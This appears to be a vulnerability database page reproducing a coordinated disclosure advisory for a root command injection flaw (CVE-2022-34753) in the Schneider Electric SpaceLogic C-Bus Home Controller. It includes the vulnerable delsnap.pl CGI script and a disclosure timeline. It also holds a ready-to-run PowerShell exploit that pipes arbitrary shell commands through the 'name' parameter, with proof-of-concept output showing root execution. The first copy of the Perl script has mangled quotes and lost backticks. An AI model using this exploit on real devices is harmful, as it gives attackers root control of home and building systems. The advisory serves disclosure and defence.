8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.971 High
EPSS
Percentile
99.8%
Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
Advisory ID: ZSL-2022-5710
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 20.07.2022
SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants.
Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems… you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide!
The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls.
The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the ‘name’ GET parameter in ‘delsnap.pl’ Perl/CGI script which is used for deleting snapshots taken from the webcam.
--------------------------------------------------------------------------------
01: #!/usr/bin/perl
02: use IO::Handle;
03:
04:
05: select(STDERR);
06: $| = 1;
07: select(STDOUT);
08: $| = 1;
09:
10: #print “\r\n\r\n”;
11:
12: $CGITempFile::TMPDIRECTORY = ‘/mnt/microsd/clipsal/ugen/imgs/’;
13: use CGI;
14:
15: my $PROGNAME = “delsnap.pl”;
16:
17: my $cgi = new CGI();
18:
19: my $name = $cgi->param(‘name’);
20: if ($name eq “list”) {
21: print “\r\n\r\n”;
22: print “DATA=”;
23: print ls -C1 /mnt/microsd/clipsal/ugen/imgs/
;
24: exit(0);
25: }
26: if ($name eq “deleteall”) {
27: print “\r\n\r\n”;
28: print “DELETINGALL=TRUE&”;
29: print rm /mnt/microsd/clipsal/ugen/imgs/*
;
30: print “COMPLETED=true\n”;
31: exit(0);
32: }
33: #print “name $name\n”;
34: print “\r\n\r\n”;
35: my $filename = “/mnt/microsd/clipsal/ugen/imgs/$name”;
36:
37: unlink $filename or die “COMPLETED=false\n”;
38:
39: print “COMPLETED=true\n”;
`
--------------------------------------------------------------------------------
Schneider Electric SE - <https://www.se.com>
SpaceLogic C-Bus Home Controller (5200WHC2)
formerly known as C-Bus Wiser Home Controller MK2
V1.31.460 and prior
Firmware: 604
Machine: OMAP3 Wiser2 Board
CPU: ARMv7 revision 2
GNU/Linux 2.6.37 (armv7l)
BusyBox v1.22.1
thttpd/2.25b
Perl v5.20.0
Clipsal 81
Angstrom 2009.X-stable
PICED 4.14.0.100
lighttpd/1.7
GCC 4.4.3
NodeJS v10.15.3
[27.03.2022] Vulnerability discovered.
[31.03.2022] Reported the vulnerability to the vendor.
[31.03.2022] Vendor receives PoC, starts analysis and creates SE-6334 (Remote Root Exploit).
[11.04.2022] Asked vendor for confirmation and status update.
[11.04.2022] Vendor is still analyzing the vulnerability. Will let us know once the case is confirmed.
[20.04.2022] Asked vendor for confirmation and scheduled patch release date.
[21.04.2022] Vendor is still analyzing.
[30.04.2022] Asked vendor for status update.
[02.05.2022] Vendor states that the product team has finalized their action plan and has provided a tentative fix release date of end of June.
[02.05.2022] Replied to the vendor.
[02.05.2022] The product team is working diligently on the fix. If there are any changes to the release date, we will let you know immediately.
[03.06.2022] Asked vendor for status update.
[03.06.2022] Vendor responds, tentative fix release date remains end of June.
[27.06.2022] Asked vendor for status update.
[28.06.2022] Vendor is finalizing the security notification and expecting to disclose on July 12th 2022.
[30.06.2022] Vendor sends encrypted draft advisory for review.
[02.07.2022] Sent our encrypted draft advisory for alignment of content.
[08.07.2022] Vendor reviews the advisory and agrees that it is aligned with the contents. Provided advisory URL and asked for release date.
[10.07.2022] Replied to the vendor with scheduled advisory release date.
[12.07.2022] Vendor released advisory SEVD-2022-193-02.
[20.07.2022] Coordinated public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>
[2] https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
[3] <https://www.se.com/ww/en/work/support/cybersecurity/wall-of-thanks.jsp>
[4] <https://vulners.com/cve/CVE-2022-34753>
[5] <https://nvd.nist.gov/vuln/detail/CVE-2022-34753>
[6] <https://packetstormsecurity.com/files/167783/>
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/231262>
[8] <https://www.cisa.gov/uscert/ncas/bulletins/sb22-199>
[9] <https://www.exploit-db.com/exploits/50987>
[20.07.2022] - Initial release
[22.07.2022] - Added reference [6] and [7]
[29.07.2022] - Added reference [8] and [9]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<<html><body><p>#SpaceLogic.ps1
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
Vendor: Schneider Electric SE
Product web page: https://www.se.com
https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
formerly known as C-Bus Wiser Home Controller MK2
V1.31.460 and prior
Firmware: 604
Summary: SpaceLogic C-Bus Home Automation System
Lighting control and automation solutions for
buildings of the future, part of SpaceLogic.
SpaceLogic C-Bus is a powerful, fully integrated
system that can control and automate lighting
and many other electrical systems and products.
The SpaceLogic C-Bus system is robust, flexible,
scalable and has proven solutions for buildings
of the future. Implemented for commercial and
residential buildings automation, it brings
control, comfort, efficiency and ease of use
to its occupants.
Wiser Home Control makes technologies in your
home easy by providing seamless control of music,
home theatre, lighting, air conditioning, sprinkler
systems, curtains and shutters, security systems...
you name it. Usable anytime, anywhere even when
you are away, via preset shortcuts or direct
control, in the same look and feel from a wall
switch, a home computer, or even your smartphone
or TV - there is no wiser way to enjoy 24/7
connectivity, comfort and convenience, entertainment
and peace of mind homewide!
The Wiser 2 Home Controller allows you to access
your C-Bus using a graphical user interface, sometimes
referred to as the Wiser 2 UI. The Wiser 2 Home
Controller arrives with a sample project loaded
and the user interface accessible from your local
home network. With certain options set, you can
also access the Wiser 2 UI from anywhere using
the Internet. Using the Wiser 2 Home Controller
you can: control equipment such as IP cameras,
C-Bus devices and non C-Bus wired and wireless
equipment on the home LAN, schedule events in
the home, create and store scenes on-board, customise
a C-Bus system using the on-board Logic Engine,
monitor the home environment including C-Bus and
security systems, control ZigBee products such
as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
Examples of equipment you might access with Wiser
2 Home Controller include lighting, HVAC, curtains,
cameras, sprinkler systems, power monitoring, Ulti-ZigBee,
multi-room audio and security controls.
Desc: The home automation solution suffers from
an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary
shell commands as the root user via the 'name' GET
parameter in 'delsnap.pl' Perl/CGI script which is
used for deleting snapshots taken from the webcam.
=========================================================
/www/delsnap.pl:
----------------
01: #!/usr/bin/perl
02: use IO::Handle;
03:
04:
05: select(STDERR);
06: $| = 1;
07: select(STDOUT);
08: $| = 1;
09:
10: #print "\r\n\r\n";
11:
12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
13: use CGI;
14:
15: my $PROGNAME = "delsnap.pl";
16:
17: my $cgi = new CGI();
18:
19: my $name = $cgi->param('name');
20: if ($name eq "list") {
21: print "\r\n\r\n";
22: print "DATA=";
23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
24: exit(0);
25: }
26: if ($name eq "deleteall") {
27: print "\r\n\r\n";
28: print "DELETINGALL=TRUE&";
29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
30: print "COMPLETED=true\n";
31: exit(0);
32: }
33: #print "name $name\n";
34: print "\r\n\r\n";
35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";
36:
37: unlink $filename or die "COMPLETED=false\n";
38:
39: print "COMPLETED=true\n";
=========================================================
Tested on: Machine: OMAP3 Wiser2 Board
CPU: ARMv7 revision 2
GNU/Linux 2.6.37 (armv7l)
BusyBox v1.22.1
thttpd/2.25b
Perl v5.20.0
Clipsal 81
Angstrom 2009.X-stable
PICED 4.14.0.100
lighttpd/1.7
GCC 4.4.3
NodeJS v10.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5710
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php
Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
CVE ID: CVE-2022-34753
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753
27.03.2022
#>
$host.UI.RawUI.ForegroundColor = "Green"
if ($($args.Count) -ne 2) {
Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
} else {
$ip = $args[0]
$cmd = $args[1]
$cmdinj = "/delsnap.pl?name=|$cmd"
Write-Host("`nSending command '$cmd' to $ip`n")
#curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
curl -v $ip$cmdinj
}
<#PoC
PS C:\> .\SpaceLogic.ps1
Usage: .\SpaceLogic.ps1 [IP] [CMD]
PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"
Sending command 'uname -a;id;pwd' to 192.168.1.2
VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
VERBOSE: received 129-byte response of content type text/html; charset=utf-8
StatusCode : 200
StatusDescription : OK
Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
uid=0(root) gid=0(root)
/custom-package
RawContent : HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Length: 129
Content-Type: text/html; charset=utf-8
Date: Thu, 30 Jun 2022 14:48:43 GMT
ETag: W/"81-LTIWJvYlDBYAlgXEy...
Forms : {}
Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;
charset=utf-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 129
PS C:\>
#>
</p></body></html>
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.971 High
EPSS
Percentile
99.8%